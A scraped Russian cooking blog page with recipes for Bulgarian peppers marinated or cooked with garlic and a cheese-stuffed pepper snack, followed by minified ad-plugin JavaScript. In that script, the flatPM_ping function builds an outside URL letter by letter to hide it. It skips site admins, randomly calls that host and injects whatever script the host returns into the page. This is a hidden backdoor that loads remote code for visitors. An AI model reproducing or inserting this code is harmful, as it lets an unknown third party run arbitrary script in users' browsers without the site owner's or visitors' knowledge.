Закуска из болгарского перца с чесноком рецепт

Чеснок с перцем — отменная закуска

Этот рецепт сейчас читают: •

Чеснок с перцем в маринаде. В Болгарии часто можно встретить закуску из перца — сладкого или острого, маринованного с чесноком. Пошаговый рецепт с фото

Как говорят в народе, выпивка — будни, а закуска — праздник! Несмотря на то, что закуска (во французской кухне — hors d’œuvre, entrée) — это пища, подаваемая перед первым или основным блюдом, обычно легкая и возбуждающая аппетит, или, как принято, служит в качестве отдельной легкой трапезы с аперитивом.

Огромный выбор холодных и горячих закусок есть во всех кухнях мира, даже там, где спиртное под строгим запретом. В состав закусок входят все те продукты, из которых готовятся остальные блюда. Овощи, мясо и рыба, птица, грибы — все идет в ход.

Боле привычные нам закуски — квашеная капуста для желудка, соленые или квашеные огурцы для настроения, квашеные помидоры для удовольствия, различные маринованные овощи, икра красная, икра черная, икра заморская баклажанная или вкусная икра кабачковая. И шпроты!

В Болгарии мне очень понравились закуски, даже скорее домашние заготовки, приготовленные из различных овощей. Всемирно известное лечо — болгарский перец, помидоры и репчатый лук, а также всевозможные «национальные» добавки.

В Болгарии часто можно встретить свежеприготовленную закуску из стручкового перца (сладкого или острого) — чеснок с перцем. Готовится закуска из перца очень быстро. Впрочем, съедается еще быстрее.

Чеснок с перцем. Пошаговый рецепт

Ингредиенты (2 порции)

  • Стручковый перец 5-6 шт
  • Чеснок 3-4 зубчика
  • Оливковое масло 3 ст. л.
  • Петрушка 5-6 веточек
  • Уксус винный 1 ст. л.
  • Специи: соль, черный перец по вкусу
  1. Исключительно по эстетическим соображениям рекомендую сладкий перец с длинным плодом. Хотя, особенно вкус не изменится, если вы используете обычный бледно-зеленый болгарский перец, или крупные перцы с кубическим плодом. Естественно, если использовать острый перец, вкус будет «несколько» иным. К примеру, в Болгарии иногда едим зеленый острый перец, приготовленный по такому рецепту, под настроение и ракию.

    Ингредиенты: красный стручковый перец, чеснок, петрушка, винный уксус, оливковое масло, соль, черный перец

    На масле обжарит перец

    Надо чтобы перец стал слегка румяным со всех сторон

    Обжаривать под крышкой до мягкости

    Очистить чеснок и оборвать с петрушки листики

    Измельчить петрушку и чеснок, посолить и поперчить

    Добавить уксус и масло

    Чеснок с перцем в легком маринаде

    Чеснок с перцем в маринаде — отменная закуска и лакомство

    Если вам понравился мой рецепт — пожалуйста, поделитесь с друзьями:

    LiveInternetLiveInternet

    Метки

    Рубрики

    • Лирика (1556)
    • Кулинарная копилка (1287)
    • Наше здоровье: красота души и тела (990)
    • Шиповник (10)
    • Вишневая нотка (7)
    • Сиреневая нотка (6)
    • Нотка куркумы (6)
    • Лимонная нотка (6)
    • Мандариновая нотка (6)
    • Малиновая нотка (6)
    • Лавровая нотка (6)
    • Виноградная нотка (5)
    • Розмариновая нотка (5)
    • Лавандовая нотка (5)
    • Облепиховая нотка (4)
    • Луковая нотка (4)
    • Морковная нотка (4)
    • Апельсиновая нотка (4)
    • Кабачковая нотка (3)
    • Шалфейная нотка (3)
    • Черничная нотка (3)
    • Подорожник (3)
    • Касторовое масло (3)
    • Персиковая нотка (3)
    • Яблоневая нотка (3)
    • Амарантовая нотка (3)
    • Кизиловая нотка (2)
    • Миртовая нотка (2)
    • Мумиё (2)
    • Коричная нотка (1)
    • Проза (626)
    • Природа и путешествия (610)
    • Все о кошках (431)
    • Притчи и легенды (353)
    • Интересное (267)
    • Полезные советы (239)
    • Музыка (199)
    • Любовь и верность, честь и слава (194)
    • Мой Питер (155)
    • Модные штучки (119)
    • Домашний кинотеатр (113)
    • Новый Год (108)
    • Любимое из детства (69)
    • Шпаргалка по русскому (56)
    • Искусство (50)
    • Я помню, я горжусь (43)
    • Чудеса света (20)
    • Французский секрет (4)

    Музыка

    Настольные игры онлайн

    Конвертер видеоссылок

    Подписка по e-mail

    Поиск по дневнику

    Статистика

    Ароматный, в меру острый болгарский перец в чесночном соусе – рецепты быстрых закусок

    Четверг, 21 Сентября 2017 г. 22:52 + в цитатник

    Рецепты закусок из болгарского перца просты до гениальности и при этом имеют все шансы стать самым эффектным украшением праздничного стола, не говоря уже о том, как это вкусно.

    Болгарский перец маринованный с чесноком

    • Болгарский перец 4 штуки. Желательно выбирать плоды правильной формы желтого и красного цветов примерно одинаковые по размеру. Впрочем, на вкусе это не скажется никак.
    • Чеснок 2-3 зубчика
    • Уксус или лимонный сок 1 чайная ложка
    • Сахар ½ чайной ложки
    • Соль по вкусу примерно 1/4 чайной ложки
    • Оливковое масло 3-4 столовые ложки. Можно заменить растительным без запаха, но вкус изменится.
    • Растительное масло для обжаривания
    • Зелень укропа или петрушки по желанию
    • Молотый перец душистый или черный
    1. Перец моем. Вырезаем плодоножку и очищаем плоды от семян. Слегка накалываем кожуру в нескольких местах.
    2. На сковороду с растительным маслом укладываем перцы и жарим на умеренном огне под крышкой. За время жарки их нужно будет перевернуть несколько раз. Зарумяниваются они быстро, так что следите, чтобы не подгорели.
    3. Чеснок чистим и измельчаем ножом или прессом.
    4. Добавляем оливковое масло, соль, сахар, лимонный сок. Зелень и молотый перец – по желанию. Можно использовать приправу «прованские травы».
    5. Когда перец приобретет вид, как на фото, то есть, уменьшится в объеме и станет плоским, он готов.
    6. Снимаем его со сковороды и сразу поливаем чесночным соусом.
    7. Оставляем до полного охлаждения, чтобы хорошо пропитался.
    8. Красиво подаем к столу.

    Болгарский перец маринованный быстрого приготовления

    Для маринования лучше брать крупные мясистые овощи желтого и красного цвета (зеленые не берите – горчат). Благо, такой перец сегодня можно купить в супермаркете в любое время года, а это значит, что нет необходимости делать заготовки на зиму. Ведь аппетитную закуску можно приготовить всегда, как только захочется.

    Ингредиенты

    • болгарский перец (желтый и красный) – 4 шт.;
    • оливковое масло – 4 ст. л.;
    • уксус белый винный – 1 ст. л.;
    • чеснок – 3 зубчика;
    • соль – по вкусу;
    • перец острый молотый – по вкусу.

    Как приготовить маринованный запеченный перец

    Болгарский перец тщательно моем (очищать от семян и плодоножки не нужно) и вытираем насухо бумажным полотенцем.

    Выкладываем перцы на противень или решетку и запекаем в разогретой до 200 ºС духовке до готовности (около 15-20 минут). На поверхности перцев должны появится подпалины, а сам перец станет мягким.

    Перец также можно запечь в микроволновой печи свч при мощности 800 Ватт в течение 5 минут; в аэрогриле – при средней скорости обдува и температуре 220 градусов 15 минут; в мультиварке – на режиме «Выпечка» 35 минут.

    Запеченный перец прямиком из духовки выкладываем в кастрюлю под плотную крышку или в пакет. Оставляем на 10-15 минут, чтобы перцы хорошенько «пропотели», после чего с них можно будет легко снять кожицу.

    Далее перцы очищаем от кожицы и семян. Сок, который образовался внутри перца, собираем в отдельную емкость.

    Подготовленные перцы нарезаем широкими полосками и складываем в стеклянный контейнер. Зубчики чеснока очищаем, нарезаем тонкими пластинками или пропускаем через чеснокодавилку и добавляем к перцу.

    Для маринада нам потребуется оливковое масло, белый винный уксус, соль, острый молотый перец и сок, который мы так бережно собрали с перцев.

    Все ингредиенты смешиваем в отдельной миске. Готовый маринад обязательно пробуем, он должен понравиться вам на вкус. Если чувствуете, что чего-то не хватает – добавьте на свое усмотрение.

    Заливаем перец с чесноком маринадом.

    Закрываем контейнер крышкой и ставим в холодильник на 4-6 часов, а лучше забыть про перцы на всю ночь.

    Наша быстрая закуска из печеных маринованных перцев готова! Достаем контейнер, открываем, выкладываем перчик на поджаренный ломтик хлеба, пробуем – ммм-м-м-м… Смак! Кстати, на праздничном столе эта закуска разлетается вмиг, как и оригинальные картофельные корзиночки.

    Готовый маринованный перец быстрого приготовления рекомендуется хранить в холодильнике не более недели, хотя… вряд ли вам понадобится этот совет. Приятного аппетита!

    Закуска из болгарского перца с чесноком рецепт

    Ингредиенты

    ИНГРИДИЕНТЫ МАССА КАЛОРИЙНОСТЬ (ккал. на 100 гр.)
    болгарский перец 2.5 кг. 23
    чеснок 3 головки 106
    зелень укропа и петрушки по 1 пучок
    растительное масло 120 мл. 899
    сахар 100 г. 374
    соль 1 ст. л.

    Пошаговый рецепт приготовления Закуска из болгарского перца с чесноком с фото

    Итак, приступим к делу:

    Помойте перец, удалите серединку с семенами, а перец нарежьте в виде соломки.

    Каждую дольку чеснока разрежьте вдоль на две половинки.

    Помойте зелень и измельчите.

    Поставьте кастрюлю с водой на огонь, добавьте соль, сахар и влейте растительное масло, как только жидкость начнет кипеть, выкладывайте в кастрюлю порезанный перец. Варите овощ 10 минут.

    Затем сюда же следует добавить чеснок и измельченную свежую зелень.

    Ингредиенты перемешайте и готовьте вместе еще 10 минут. Вот и все, вкуснейшая закуска из болгарского перца с чесноком готова!

    Видеорецепт Закуска из болгарского перца с чесноком

    Закуска из болгарского перца холодные закуски

    Закуску из болгарского перца можно приготовить и по другому рецепту, ведь холодные закуски бывают всевозможные и каждая, обладает своим неповторимым и оригинальным вкусом!

    Итак, для того чтобы приготовить закуску по этому рецепту вам понадобится:

    Ингредиенты:
    болгарский красный перец – 2 штуки;
    болгарский желтый перец – 2 штуки;
    помидоры – 4 штуки;
    оливковое масло – 1 чайная ложка;
    лук шалот – 2 штуки;
    чеснок – 2 зубка;
    свежий базилик – 100 грамм;
    черный молотый перец.

    А теперь займемся работой:

      Сначала возьмите порционные формы, смажьте их, используйте оливковое масло.

    В чистую миску отправьте чищенный и измельченный лук шалот.

    Почистите и измельчите чеснок, который отправьте в емкость с луком.

    Помойте перец, удалите серединку, нарежьте в виде соломки.

    Далее в формы выкладывайте слоями перец сначала желтый, потом красный, затем порезанные в виде ломиков помидоры, слои пересыпайте луком, чесноком и базиликом в измельченном виде.

    Формы накройте отрезом пищевой пленки, сверху положите груз, пусть кушанье постоит 6 часов в холодильнике.

  2. Перед тем как будете подавать закуску к столу, снимите пленку, аккуратно с помощью ножа отделите лакомство от формочек, переверните на плоское блюдо и снимите формы. Вот и все, отведайте вкусную и аппетитную закуску!

Приятного Вам аппетита!

Болгарский перец с сыром

Болгарский перец, фаршированный сыром: холодная закуска, которая готовится всего за 20 минут. Порадуйте себя красивым и аппетитным блюдом!

Ингредиенты:

  • Сладкий болгарский перец — 2 шт.
  • Морковь — 0,5 шт.
  • Плавленый сырок — 1 шт. 80 г
  • Сыр твердый — 100 г
  • Чеснок — 3 зубчика
  • Укроп — 4 веточки
  • Майонез — 3 столовые ложки

Количество продуктов рассчитано на 4 порции.

Пошаговое приготовление закуски:

  1. Для этой закуски лучше взять сладкий болгарский перец небольшого размера и немного вытянутой формы. Снимаем у перца плодоножку и убираем семена. Моем и обсушиваем бумажным полотенцем. Убирать внутренние перегородки не нужно, они будут поддерживать начинку.
  2. Для начинки нужна небольшая морковь или половинка средней. Её очищаем, моем и натираем на мелкой терке. Морковь добавит пестроты в начинку, к тому же она полезная и хорошо сочетается с сыром и чесноком.
  3. Твердый сыр натираем на средней терке.
  4. Чтобы вкус начинки получился еще более сливочным, добавим в нее плавленый сырок, который также натираем на средней терке.
  5. Три зубчика чеснока очищаем и измельчаем с помощью мелкой терки или чеснокодавилки. Начинка получается средней остроты. По вкусу можно добавить или наоборот уменьшить количество чеснока.
  6. Свежий укроп споласкиваем в холодной воде, убираем жесткие стебли и мелко рубим ножом.
  7. Собираем в одной чашке все ингредиенты для начинки. Добавляем майонез. Чтобы блюдо получилось менее калорийным и более полезным, майонез можно заменить на сметану.
  8. Все хорошо перемешиваем. Начинка не должна рассыпаться, иначе она не будет держаться в закуске. Пробуем начинку на соль. Обычно досаливать не нужно – сыр и майонез содержат и так много соли. Если заправили начинку сметаной, то можно добавить немного соли и черного душистого перца, чтобы сделать вкус немного ярче.
  9. Фаршируем перец начинкой, она должна быть плотно утрамбованной, чтобы не рассыпаться.
  10. Острым ножом разрезаем перец на несколько частей, высотой около 0,7-1 см. У слишком тонкой закуски начинка будет падать. Если перец большой, то можно разрезать его не поперек, а вдоль, получатся лодочки с начинкой.

Приятного аппетита вам!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};